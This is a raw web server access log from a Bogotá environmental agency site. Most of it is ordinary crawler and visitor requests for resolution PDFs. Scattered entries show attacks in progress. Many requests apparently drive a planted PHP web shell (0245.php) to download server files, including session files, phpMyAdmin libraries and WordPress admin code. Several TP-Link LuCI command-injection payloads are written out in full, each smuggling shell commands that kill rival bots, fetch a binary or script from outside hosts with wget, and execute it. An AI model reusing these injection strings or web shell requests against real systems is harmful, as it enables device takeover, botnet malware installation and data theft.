139.180.209.154 - - [23/Jun/2024:08:20:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page31.swf&ft=download HTTP/1.1" 200 213300
201.245.192.253 - - [23/Jun/2024:08:21:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:08:22:31 -0500] "HEAD / HTTP/1.1" 200 -
47.128.45.191 - - [23/Jun/2024:08:23:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6043.pdf&ft=download HTTP/1.1" 200 20135
143.198.87.146 - - [23/Jun/2024:06:44:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2024&f=00407.pdf&ft=download HTTP/1.1" 200 1687205
167.99.79.53 - - [23/Jun/2024:08:24:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2414.pdf HTTP/1.1" 200 2739
201.245.192.253 - - [23/Jun/2024:08:26:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
47.128.96.89 - - [23/Jun/2024:08:27:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6216.pdf&ft=download HTTP/1.1" 200 20134
216.245.221.92 - - [23/Jun/2024:08:27:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:08:27:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:08:27:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
159.89.203.120 - - [23/Jun/2024:08:28:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=tbl_chart.lib.php&ft=download HTTP/1.1" 200 10256
173.252.107.116 - - [23/Jun/2024:08:28:47 -0500] "GET /consulta-y-conoce-los-proyectos-de-resolucion-de-para-los-planes-de-manejo-ambiental-de-cinco-humedales-en-bogota.html HTTP/1.1" 200 971
173.252.107.3 - - [23/Jun/2024:08:28:47 -0500] "GET /consulta-y-conoce-los-proyectos-de-resolucion-de-para-los-planes-de-manejo-ambiental-de-cinco-humedales-en-bogota.html HTTP/1.1" 200 971
201.245.192.253 - - [23/Jun/2024:08:29:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:08:30:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
47.128.97.122 - - [23/Jun/2024:08:31:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page55.swf&ft=download&white=1 HTTP/1.1" 200 16000
66.249.66.21 - - [23/Jun/2024:08:31:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/1817.pdf HTTP/1.1" 200 396626
124.243.139.58 - - [23/Jun/2024:08:31:51 -0500] "GET /distrito-exalto-a-246-empresas-de-bogota-por-su-alto-desempeno-y-responsabilidad-ambiental-durante-2023.html HTTP/1.1" 200 1039
201.245.192.253 - - [23/Jun/2024:08:31:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:08:32:31 -0500] "HEAD / HTTP/1.1" 200 -
47.128.127.150 - - [23/Jun/2024:08:35:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cimg&f=module_table_top.png&ft=download HTTP/1.1" 200 337
45.76.150.68 - - [23/Jun/2024:08:36:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=zip_extension.lib.php&ft=download HTTP/1.1" 200 5615
201.245.192.253 - - [23/Jun/2024:08:36:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
207.148.125.99 - - [23/Jun/2024:06:56:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6341.pdf&ft=download HTTP/1.1" 200 327335
216.245.221.92 - - [23/Jun/2024:08:37:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:08:37:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:08:37:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.18.177 - - [23/Jun/2024:08:39:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono&f=._cambio_climatico_0clip_image002.png&ft=download HTTP/1.1" 200 4096
201.245.192.253 - - [23/Jun/2024:08:39:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:08:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
139.180.185.44 - - [23/Jun/2024:08:40:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300&f=00002299.tif&ft=download HTTP/1.1" 200 153934
201.245.192.253 - - [23/Jun/2024:08:41:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
191.109.165.114 - - [23/Jun/2024:08:41:50 -0500] "GET /appsia/controlador HTTP/1.1" 503 1124
216.245.221.92 - - [23/Jun/2024:08:42:31 -0500] "HEAD / HTTP/1.1" 200 -
47.128.18.248 - - [23/Jun/2024:08:44:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2635.pdf&ft=download HTTP/1.1" 200 364199
207.46.13.168 - - [23/Jun/2024:08:44:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/RESOLUCION%20311%20DE%202001.pdf HTTP/1.1" 304 -
139.180.156.80 - - [23/Jun/2024:08:44:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6382.pdf HTTP/1.1" 200 2901
40.77.167.47 - - [23/Jun/2024:08:44:44 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
40.77.167.9 - - [23/Jun/2024:08:44:56 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
40.77.167.9 - - [23/Jun/2024:08:44:57 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
40.77.167.9 - - [23/Jun/2024:08:44:57 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
40.77.167.9 - - [23/Jun/2024:08:44:57 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
207.46.13.168 - - [23/Jun/2024:08:45:01 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
207.46.13.168 - - [23/Jun/2024:08:45:01 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
201.245.192.253 - - [23/Jun/2024:08:46:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:08:47:31 -0500] "HEAD / HTTP/1.1" 200 -
47.128.40.167 - - [23/Jun/2024:08:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=cds.php&ft=download HTTP/1.1" 200 5138
149.28.131.134 - - [23/Jun/2024:08:48:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=sess_u2rkr3co9280i9t6rgc9uuc5a7&ft=download HTTP/1.1" 200 10889
45.148.10.174 - - [23/Jun/2024:08:49:11 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [23/Jun/2024:08:49:12 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
40.77.167.14 - - [23/Jun/2024:08:50:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4272.pdf HTTP/1.1" 304 -
40.77.167.14 - - [23/Jun/2024:08:50:35 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
40.77.167.14 - - [23/Jun/2024:08:50:35 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
40.77.167.14 - - [23/Jun/2024:08:50:36 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
201.245.192.253 - - [23/Jun/2024:08:51:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
47.128.51.105 - - [23/Jun/2024:08:52:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=spot-invitacion-cabildos.flv&ft=download HTTP/1.1" 200 4664978
216.245.221.92 - - [23/Jun/2024:08:52:31 -0500] "HEAD / HTTP/1.1" 200 -
167.99.70.135 - - [23/Jun/2024:08:52:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300&f=00002267.tif&ft=download HTTP/1.1" 200 126712
40.77.167.9 - - [23/Jun/2024:08:53:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2968.pdf HTTP/1.1" 304 -
216.244.66.195 - - [23/Jun/2024:08:54:12 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.19 - - [23/Jun/2024:08:54:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0481.pdf HTTP/1.1" 304 -
66.249.66.20 - - [23/Jun/2024:08:54:28 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
66.249.66.20 - - [23/Jun/2024:08:54:30 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Nuestros%20M%C3%B3dulos.pdf HTTP/1.1" 304 -
40.77.167.19 - - [23/Jun/2024:08:56:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4665.pdf HTTP/1.1" 304 -
47.128.117.174 - - [23/Jun/2024:08:56:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5C&f=wp-cron.php&ft=download&white=1 HTTP/1.1" 200 3115
66.249.66.20 - - [23/Jun/2024:08:56:38 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/1156.pdf HTTP/1.1" 304 -
143.198.87.146 - - [23/Jun/2024:08:56:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page67.swf&ft=download HTTP/1.1" 200 30306
201.245.192.253 - - [23/Jun/2024:08:56:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:08:57:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.8 - - [23/Jun/2024:08:57:31 -0500] "GET /BLA/resoluciones/AUTOS%202013/0562.pdf HTTP/1.1" 200 1862823
168.119.253.32 - - [23/Jun/2024:08:58:27 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.20 - - [23/Jun/2024:08:59:42 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-146-16.docx HTTP/1.1" 304 -
47.128.34.119 - - [23/Jun/2024:09:00:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=options.php&ft=download&white=1 HTTP/1.1" 200 10866
45.32.123.142 - - [23/Jun/2024:09:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page60.swf&ft=download HTTP/1.1" 200 21548
201.245.192.253 - - [23/Jun/2024:09:01:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:09:02:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.8 - - [23/Jun/2024:09:03:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4489.pdf HTTP/1.1" 200 348772
149.28.152.164 - - [23/Jun/2024:09:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2741.pdf&ft=download HTTP/1.1" 200 20134
47.128.34.130 - - [23/Jun/2024:09:04:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1151-1200&f=00001173.tif&ft=download HTTP/1.1" 200 154028
216.244.66.195 - - [23/Jun/2024:09:05:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3297.pdf HTTP/1.1" 200 510388
216.244.66.195 - - [23/Jun/2024:09:05:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3798.pdf HTTP/1.1" 200 375732
124.243.136.24 - - [23/Jun/2024:09:05:44 -0500] "GET /robots.txt HTTP/1.1" 404 1034
216.244.66.195 - - [23/Jun/2024:09:05:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%201400-1449.tif HTTP/1.1" 200 8467759
216.244.66.195 - - [23/Jun/2024:09:06:35 -0500] "GET /BLA/resoluciones/AUTOS%202009/3100.pdf HTTP/1.1" 200 146627
201.245.192.253 - - [23/Jun/2024:09:06:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:09:07:05 -0500] "GET /BLA/resoluciones/AUTOS%202007/0037.pdf HTTP/1.1" 200 103770
216.245.221.92 - - [23/Jun/2024:09:07:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:09:07:34 -0500] "GET /BLA/resoluciones/AUTOS%202007/0071.pdf HTTP/1.1" 200 47261
216.244.66.195 - - [23/Jun/2024:09:08:02 -0500] "GET /BLA/resoluciones/AUTOS%202007/0138.pdf HTTP/1.1" 200 99448
216.244.66.195 - - [23/Jun/2024:09:08:29 -0500] "GET /BLA/resoluciones/AUTOS%202007/0220.pdf HTTP/1.1" 200 17400
216.244.66.195 - - [23/Jun/2024:09:08:55 -0500] "GET /BLA/resoluciones/AUTOS%202007/0262.pdf HTTP/1.1" 200 173397
47.128.20.105 - - [23/Jun/2024:09:09:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0464.pdf&ft=download HTTP/1.1" 200 405159
216.244.66.195 - - [23/Jun/2024:09:09:20 -0500] "GET /BLA/resoluciones/AUTOS%202007/0319.pdf HTTP/1.1" 200 58953
216.244.66.195 - - [23/Jun/2024:09:09:45 -0500] "GET /BLA/resoluciones/AUTOS%202007/0445.pdf HTTP/1.1" 200 13650
216.244.66.195 - - [23/Jun/2024:09:10:07 -0500] "GET /BLA/resoluciones/AUTOS%202007/0480.pdf HTTP/1.1" 200 31337
216.244.66.195 - - [23/Jun/2024:09:10:29 -0500] "GET /BLA/resoluciones/AUTOS%202007/0630.pdf HTTP/1.1" 200 86984
66.249.66.19 - - [23/Jun/2024:09:10:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4361.pdf HTTP/1.1" 304 -
216.244.66.195 - - [23/Jun/2024:09:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202019/1525.pdf HTTP/1.1" 200 242513
216.244.66.195 - - [23/Jun/2024:09:11:10 -0500] "GET /BLA/resoluciones/AUTOS%202019/2167.pdf HTTP/1.1" 200 255959
216.244.66.195 - - [23/Jun/2024:09:11:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/2439.pdf HTTP/1.1" 200 252047
216.244.66.195 - - [23/Jun/2024:09:11:47 -0500] "GET /BLA/resoluciones/AUTOS%202024/00560.pdf HTTP/1.1" 200 493993
201.245.192.253 - - [23/Jun/2024:09:11:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:09:12:06 -0500] "GET /BLA/resoluciones/AUTOS%202024/01413.pdf HTTP/1.1" 200 340113
216.245.221.92 - - [23/Jun/2024:09:12:31 -0500] "HEAD / HTTP/1.1" 200 -
45.32.118.99 - - [23/Jun/2024:09:12:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=display_import.inc.php&ft=download HTTP/1.1" 200 1110
47.128.18.248 - - [23/Jun/2024:09:13:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5C&f=eula.1036.txt&ft=download HTTP/1.1" 200 17734
216.244.66.195 - - [23/Jun/2024:09:16:25 -0500] "GET /BLA/resoluciones/AUTOS%202011/5952.pdf HTTP/1.1" 200 158734
216.244.66.195 - - [23/Jun/2024:09:16:40 -0500] "GET /BLA/resoluciones/AUTOS%202011/6035.pdf HTTP/1.1" 200 726372
143.198.87.146 - - [23/Jun/2024:09:16:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150&f=00001110.tif HTTP/1.1" 200 17695
143.198.87.216 - - [23/Jun/2024:09:16:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
143.198.87.146 - - [23/Jun/2024:09:16:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
139.180.143.197 - - [23/Jun/2024:09:16:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
143.198.87.216 - - [23/Jun/2024:09:16:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
188.166.211.115 - - [23/Jun/2024:09:16:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
143.198.87.146 - - [23/Jun/2024:09:16:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
143.198.87.216 - - [23/Jun/2024:09:16:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
188.166.211.115 - - [23/Jun/2024:09:16:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
45.77.43.237 - - [23/Jun/2024:09:16:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
201.245.192.253 - - [23/Jun/2024:09:16:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
139.180.143.197 - - [23/Jun/2024:09:16:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
216.244.66.195 - - [23/Jun/2024:09:16:57 -0500] "GET /BLA/resoluciones/AUTOS%202011/6055.pdf HTTP/1.1" 200 259888
216.244.66.195 - - [23/Jun/2024:09:17:10 -0500] "GET /BLA/resoluciones/AUTOS%202011/6423.pdf HTTP/1.1" 200 180264
47.128.18.181 - - [23/Jun/2024:09:17:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1099.pdf&ft=download HTTP/1.1" 200 749223
216.245.221.92 - - [23/Jun/2024:09:17:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:09:17:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:09:17:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:09:17:41 -0500] "GET /BLA/resoluciones/AUTOS%202011/6752.pdf HTTP/1.1" 200 232644
157.55.39.10 - - [23/Jun/2024:09:17:52 -0500] "GET /BLA/resoluciones/AUTOS%202023/2274.pdf HTTP/1.1" 304 -
52.167.144.235 - - [23/Jun/2024:09:17:58 -0500] "GET /BLA/resoluciones/AUTOS%202022/0805.pdf HTTP/1.1" 200 379760
216.244.66.195 - - [23/Jun/2024:09:18:07 -0500] "GET /BLA/resoluciones/AUTOS%202011/6789.pdf HTTP/1.1" 200 128510
216.244.66.195 - - [23/Jun/2024:09:18:32 -0500] "GET /BLA/resoluciones/AUTOS%202011/7594.pdf HTTP/1.1" 200 241918
216.244.66.195 - - [23/Jun/2024:09:19:02 -0500] "GET /BLA/resoluciones/AUTOS%202011/7798.pdf HTTP/1.1" 200 2506848
216.244.66.195 - - [23/Jun/2024:09:19:52 -0500] "GET /BLA/resoluciones/AUTOS%202013/3415.pdf HTTP/1.1" 200 318831
201.245.192.253 - - [23/Jun/2024:09:19:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:09:20:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:09:20:23 -0500] "GET /BLA/resoluciones/AUTOS%202015/4496.pdf HTTP/1.1" 200 577876
185.244.36.200 - - [23/Jun/2024:09:20:25 -0500] "GET / HTTP/1.1" 200 319
207.148.69.213 - - [23/Jun/2024:09:20:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page39.swf&ft=download HTTP/1.1" 200 19600
216.244.66.195 - - [23/Jun/2024:09:20:54 -0500] "GET /BLA/resoluciones/AUTOS%202015/4901.pdf HTTP/1.1" 200 519146
216.244.66.195 - - [23/Jun/2024:09:21:23 -0500] "GET /BLA/resoluciones/AUTOS%202015/5195.pdf HTTP/1.1" 200 503650
47.128.48.240 - - [23/Jun/2024:09:21:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150905-1043-201000.txt&ft=download&white=1 HTTP/1.1" 200 645
201.245.192.253 - - [23/Jun/2024:09:21:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:09:21:51 -0500] "GET /BLA/resoluciones/AUTOS%202018/5017.pdf HTTP/1.1" 200 255589
173.252.79.1 - - [23/Jun/2024:09:22:03 -0500] "GET /images/Convocatoria%20Acercar%202024%20(1)%20(1).jpeg HTTP/1.1" 200 61100
216.244.66.195 - - [23/Jun/2024:09:22:20 -0500] "GET /BLA/resoluciones/AUTOS%202018/6288.pdf HTTP/1.1" 200 256694
216.245.221.92 - - [23/Jun/2024:09:22:30 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:09:22:46 -0500] "GET /BLA/resoluciones/AUTOS%202018/6296.pdf HTTP/1.1" 200 254806
216.244.66.195 - - [23/Jun/2024:09:23:10 -0500] "GET /BLA/resoluciones/AUTOS%202018/6599.pdf HTTP/1.1" 200 310817
128.199.220.158 - - [23/Jun/2024:09:24:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=sess_c6s3limkda58f7g5a1jb63pqi2&ft=download HTTP/1.1" 200 10889
47.128.48.216 - - [23/Jun/2024:09:25:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1828.pdf&ft=download HTTP/1.1" 200 364199
201.245.192.253 - - [23/Jun/2024:09:26:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.245.221.92 - - [23/Jun/2024:09:27:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:09:27:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:09:27:39 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
185.191.127.212 - - [23/Jun/2024:09:27:47 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
114.119.132.238 - - [23/Jun/2024:09:28:28 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2004/&sort=name&order=desc HTTP/1.1" 200 14311
159.223.57.32 - - [23/Jun/2024:09:28:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=media-upload.php&ft=download HTTP/1.1" 200 3125
47.128.99.228 - - [23/Jun/2024:09:29:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ckmz&f=vallas_otorgadas_Octubre2014.kmz&ft=download HTTP/1.1" 200 107671
201.245.192.253 - - [23/Jun/2024:09:29:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:09:30:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
141.98.83.197 - - [23/Jun/2024:09:31:31 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [23/Jun/2024:09:31:31 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [23/Jun/2024:09:31:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
40.77.167.38 - - [23/Jun/2024:09:32:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/5293.pdf HTTP/1.1" 304 -
216.245.221.92 - - [23/Jun/2024:09:32:30 -0500] "HEAD / HTTP/1.1" 200 -
146.190.107.60 - - [23/Jun/2024:09:32:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5767.pdf&ft=download HTTP/1.1" 200 345489
